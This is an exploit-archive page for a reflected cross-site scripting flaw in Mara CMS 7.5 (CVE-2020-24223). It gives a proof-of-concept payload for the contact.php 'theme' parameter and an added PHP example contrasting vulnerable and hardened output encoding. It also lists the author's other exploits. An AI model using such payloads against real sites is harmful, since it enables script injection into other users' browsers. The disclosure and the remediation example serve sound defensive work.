Author
"George Tsimpidas"
Platform
php
Release date
2020-08-31
```
# Exploit Title: Mara CMS 7.5 - Reflective Cross-Site Scripting
# Google Dork: NA
# Date: 2020-08-01
# Exploit Author: George Tsimpidas
# Vendor Homepage: https://sourceforge.net/projects/maracms/
# Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
# Version: 7.5
# Tested on: Kali Linux(x64)
# CVE : CVE-2020-24223

Mara CMS 7.5 suffers from a Reflected Cross Site Scripting vulnerability.

Description :

This Reflected XSS vulnerability allows any authenticated user to inject malicious code via the parameter contact.php?theme=<inject>. The vulnerability exists because the parameter is not properly sanitized and this can lead to malicious code injection that will be executed on the target’s browser.

PoC :

Use Payload : seven69387';alert(1)//154

Path : http://localhost/contact.php?theme=< inject payload here>

Injection Example :

http://localhost/contact.php?theme=seven69387';alert(1)//154
```
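One way to close this class of bug, shown as an added example that is not Mara CMS code and not part of the original advisory. It assumes the `theme` value is reflected into a single-quoted JavaScript string (the page does not show the sink); the function names and the theme allow-list are hypothetical.

```php
<?php
// Added example, NOT Mara CMS source. Assumption: the 'theme' query parameter
// is reflected into a single-quoted JavaScript string literal, which is what
// the shape of the PoC payload (quote, statement, comment) suggests.

// Constructed allow-list of theme names (hypothetical values).
const ALLOWED_THEMES = ['default', 'dark', 'print'];

// Vulnerable pattern: the raw value is concatenated into a JS string literal,
// so a single quote in the input ends the literal early.
function render_theme_unsafe(string $theme): string
{
    return "<script>var theme = '" . $theme . "';</script>";
}

// Encode a value for a JavaScript string context. The JSON_HEX_* flags turn
// <, >, &, ' and " into \uXXXX escapes, so the value can neither close the
// string literal nor terminate the surrounding <script> element.
function js_string(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_THROW_ON_ERROR;
    return json_encode($value, $flags);
}

// Hardened: allow-list the value first, then still encode it for the sink.
function render_theme_safe(string $theme): string
{
    if (!in_array($theme, ALLOWED_THEMES, true)) {
        $theme = ALLOWED_THEMES[0]; // fall back instead of reflecting input
    }
    return '<script>var theme = ' . js_string($theme) . ';</script>';
}

// Payload quoted from the advisory above, used here as test input only.
$poc = "seven69387';alert(1)//154";

echo render_theme_unsafe($poc), PHP_EOL;  // raw reflection
echo render_theme_safe($poc), PHP_EOL;    // allow-list plus encoding
// Encoding alone, for parameters that must remain free-form text:
echo '<script>var theme = ', js_string($poc), ';</script>', PHP_EOL;
```

`htmlspecialchars()` without `ENT_QUOTES` leaves single quotes untouched on PHP versions before 8.1, so it is not a substitute for JavaScript-context encoding here.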
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-10-14 | "Guild Wars 2 - Insecure Folder Permissions" | local | windows | "George Tsimpidas" |
2020-10-13 | "Battle.Net 1.27.1.12428 - Insecure File Permissions" | local | windows | "George Tsimpidas" |
2020-10-12 | "Liman 0.7 - Cross-Site Request Forgery (Change Password)" | webapps | multiple | "George Tsimpidas" |
2020-10-12 | "Online Students Management System 1.0 - 'username' SQL Injections" | webapps | php | "George Tsimpidas" |
2020-08-31 | "Mara CMS 7.5 - Reflective Cross-Site Scripting" | webapps | php | "George Tsimpidas" |
```python
import requests

# Fetch this entry's details as JSON from the nmmapper API
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/48777/?format=json', timeout=10)
```